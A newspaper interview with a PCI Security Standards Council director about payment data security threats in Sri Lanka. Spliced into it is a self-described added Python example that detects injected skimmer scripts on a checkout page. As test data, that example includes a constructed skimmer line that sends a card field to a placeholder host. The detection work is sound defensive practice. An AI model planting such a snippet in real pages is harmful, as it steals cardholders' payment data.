‘Strong data security foundation starts with people, processes and technology’

Wednesday, 11 October 2023 00:10

PCI Security Standards Council Regional Director India & South Asia Nitin Bhatnagar

The PCI Security Standards Council (PCI SSC) is a global forum that brings together payments industry stakeholders to develop and drive adoption of data security standards and resources for safe payments worldwide.

It leads a global, cross-industry effort to increase payment security by providing industry-driven, flexible and effective data security standards and programs that help businesses detect, mitigate and prevent cyber attacks and breaches. In this interview, PCI Security Standards Council Regional Director India & South Asia Nitin Bhatnagar shares key insights into the latest developments in, and challenges for, the global payment industry and fintechs, as well as Sri Lanka. Nitin will also speak at the Daily FT-CICRA Holdings 9th Annual Cyber Security Summit CEOs Breakfast Forum today and the full-day forum tomorrow, both at the Cinnamon Grand, Oak Room.

Q: What are the general security and compliance challenges for the payment industry and fintechs?

A: Cybersecurity is one of the significant national security challenges that countries face all over the world. Cyberattacks and data breaches on payment infrastructure are a global problem. Some of the common challenges here in Sri Lanka are:

  • Companies in the region are more susceptible to attacks as they lag behind when it comes to incident detection and breach response time.
  • The overall IT security budget in Sri Lanka is only 5-10%, compared to 25-30% for some developed countries. With restricted budgets, innovation and quicker decision-making take a backseat.
  • The gap in skilled cybersecurity professionals in the country.

Overall, there is a need for a mindset change. Organisations need to become aware of security and take it seriously because criminals take it seriously – their sole objective is to break into an organisation, steal data and monetise it.

Q: Can you please explain the present and evolving global scenario in data security?

A: With a strong data security foundation, you can protect your customer payment data and prevent data breaches that can put you out of business. A strong data security foundation starts with people, processes and technology. The PCI Data Security Standard (PCI DSS) applies to all entities that store, process, and/or transmit cardholder data. It covers technical and operational practices for system components included in or connected to environments with cardholder data. If you accept or process payment cards, PCI DSS applies to you. By focusing on security as a continuous process, organisations will have greater assurance in their PCI DSS v4.0 implementations and reduce the risk of security incidents and breaches.

Q: How do you see the Sri Lankan payment industry and fintech market from a data security aspect?

A: Sri Lanka has been low on awareness and adoption of payment data security standards. Effective implementation of PCI Standards to protect payment data can only be achieved with properly trained staff, having the right processes in place and through the right use of technology.

Q: Are there any suggestions you would like to put forward to enhance the data security of the Sri Lanka payment industry?

A: A less-cash society seems fast approaching, and that’s good news for Sri Lanka. The road to stronger payment security involves global collaboration; organisations should start prioritising data security as an important element of their day-to-day business activities. CFOs/CXOs investing in cyber security is equally important. Getting employees trained and improving on cyber hygiene will help organisations take steps in the right direction. Becoming a PCI SSC Associate Participating Organisation (APO) can help better protect your organisation from cybercrime by being part of a community of payment professionals. As an APO, your organisation will also have access to free and discounted training and regional events, making it a cost-effective way to invest in cybersecurity.

Q: What kinds of trends are you seeing in the payment industry in Sri Lanka?

A: We are already seeing some great steps being taken to address some of the most important issues in payment card security in Sri Lanka. Industry collaboration, both domestically and globally, continues to be hugely important to help tackle the growing threat of cybercrime. The potent combination of sharing best practices through the PCI SSC APO program, global industry collaboration, and enhancements to payments infrastructure all continue to help protect the growth of the payment industry and combat cybercrime in Sri Lanka.

Q: What are the opportunities? And what are the threats to payment security there?

A: Online digital skimming, social engineering, and ransomware are three types of cyberattacks that have the potential to disrupt business operations. Online digital skimming is used to steal personal data from online payment forms, such as email addresses, passwords, and credit card numbers. To help prevent these attacks, companies should adopt the appropriate data security standards and encourage employees to follow them.

Businesses should also invest in employee training to ensure that security is ingrained in their company’s culture as well as their devices. Keeping all company software, hardware, and tools up to date and patched can also help minimise the risk of falling victim to a cyberattack. Secondly, social engineering is the use of psychological manipulation to gain access to systems or data, relying on human trust and goodwill to perform a successful attack.

In social engineering attacks, fraudsters will attempt to persuade users to make security errors or share critical information, often over email. It comes in five forms, including baiting, scareware, pretexting, phishing, and spear phishing. To mitigate the risk of falling prey to these attacks, individuals should ensure that they do not open emails and attachments from unknown or suspicious sources. They should also use multi-factor authentication (MFA) to make it more difficult for cybercriminals to access their information.

Finally, ransomware is where cybercriminals prevent a user from accessing their information by locking their computer or encrypting their files until a ransom is paid. Maintaining strong passwords and backing up business-critical information can help minimise the risk of a successful ransomware attack. Additionally, individuals should also keep their systems up to date and avoid downloading or installing anything from unknown sources.
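The digital skimming threat described in this answer works by injecting a script into the merchant's checkout page that copies form fields to an attacker-controlled server. The following is an added example, not code from the interview or from PCI SSC: it shows the detection-side control a practitioner would deploy, a script inventory of the payment page compared against an authorised baseline, plus the Subresource Integrity (SRI) hash used to pin a known-good script. The checkout page markup, the script URLs and the injected snippet are all constructed for the example; `pay.example.com` and `collector.example.invalid` are placeholders, not real hosts.

```python
"""Detect unauthorised scripts on a payment page by comparing against a baseline.

Added example. Models the script-inventory / change-detection control used
against online digital skimming. All page markup below is constructed.
"""
import base64
import hashlib
from html.parser import HTMLParser


class ScriptCollector(HTMLParser):
    """Collects every <script> element: external ones by src, inline ones by body."""

    def __init__(self):
        super().__init__()
        self.scripts = []          # list of (src or None, inline_text)
        self._in_script = False
        self._current_src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":        # HTMLParser lower-cases tag names
            self._in_script = True
            self._current_src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:        # script bodies arrive as raw CDATA
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._current_src, "".join(self._buf).strip()))
            self._in_script = False


def script_fingerprints(html):
    """Fingerprint each script: 'src:<url>' if external, 'inline:<sha256>' if inline."""
    parser = ScriptCollector()
    parser.feed(html)
    fingerprints = set()
    for src, body in parser.scripts:
        if src:
            fingerprints.add("src:" + src)
        else:
            fingerprints.add("inline:" + hashlib.sha256(body.encode()).hexdigest())
    return fingerprints


def unauthorised_scripts(html, baseline):
    """Scripts present on the page that are not in the authorised baseline."""
    return script_fingerprints(html) - baseline


def sri_integrity(script_body):
    """SRI 'integrity' attribute value (sha256, base64) for a known-good script."""
    digest = hashlib.sha256(script_body.encode()).digest()
    return "sha256-" + base64.b64encode(digest).decode()


# Constructed checkout page: one external payment script, one inline helper.
BASELINE_PAGE = """<html><body>
<form id="checkout" action="/pay" method="post">
  <input name="card"><input name="cvv"><button>Pay</button>
</form>
<script src="https://pay.example.com/checkout.js"></script>
<script>document.getElementById('checkout').dataset.ready = '1';</script>
</body></html>"""

# Constructed skimmer-style injection: copies a form field to a third-party host.
INJECTED_SNIPPET = (
    "new Image().src='https://collector.example.invalid/?d='"
    "+encodeURIComponent(document.forms[0].card.value);"
)
TAMPERED_PAGE = BASELINE_PAGE.replace(
    "</body>", "<script>" + INJECTED_SNIPPET + "</script></body>")

# The baseline is taken once from the reviewed, authorised version of the page.
BASELINE = script_fingerprints(BASELINE_PAGE)

if __name__ == "__main__":
    print("clean page   :", sorted(unauthorised_scripts(BASELINE_PAGE, BASELINE)))
    print("tampered page:", sorted(unauthorised_scripts(TAMPERED_PAGE, BASELINE)))
    print("SRI for helper:", sri_integrity(
        "document.getElementById('checkout').dataset.ready = '1';"))
```

In practice the baseline is regenerated only through the change-control process, the check runs against the page as served to real browsers (so a compromised CDN or tag manager is caught, not just the origin copy), and the SRI value is placed on the `<script>` tag so the browser itself refuses a modified external script.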

Q: What is the role of PCI SSC, and what is it doing to enhance the payment industry and fintech industry of a country like Sri Lanka?

A: The PCI Security Standards Council (PCI SSC) is a global forum that brings together payments industry stakeholders for the ongoing development, enhancement, storage, dissemination, and implementation of security standards for account data protection. In Sri Lanka, our main objective has been to drive awareness and encourage the adoption of the PCI security standards for payment card security. 

We have been working closely with banks, regulators, law enforcement, and other key stakeholders across the Sri Lanka payment ecosystem, not only to promote PCI standards but also to help the ever-growing payments industry focus on security.
